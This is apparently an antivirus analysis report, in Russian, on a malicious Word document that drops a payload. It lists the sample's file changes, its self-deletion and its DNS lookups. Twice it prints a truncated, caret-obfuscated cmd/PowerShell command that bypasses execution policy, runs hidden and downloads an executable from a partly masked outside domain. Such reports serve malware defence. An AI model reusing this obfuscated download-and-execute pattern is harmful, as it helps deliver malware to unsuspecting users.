Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://go#####egoidnei799.com/ttt/2002.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://go#####e...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
Удаляет следующие файлы
- <Текущая директория>\~wrd0000.tmp
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.doc
Самоудаляется.
Сетевая активность
UDP
- DNS ASK go#####egoidnei799.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "p^o^WE^R^SHe^ll.eXE -^E^x^EC^U^t^I^oN^pol^icY byP^ass ^-^N^oPRoFIlE -^wIn^dOW^St^yLe^ h^IdDEN ^(neW^-^oBJ^ECT s^YsteM.nEt.W^e^bC^L^I^EN^t)^.^D^OWNloA^Df^IL^e('http://go#####e...' (со скрытым окном)
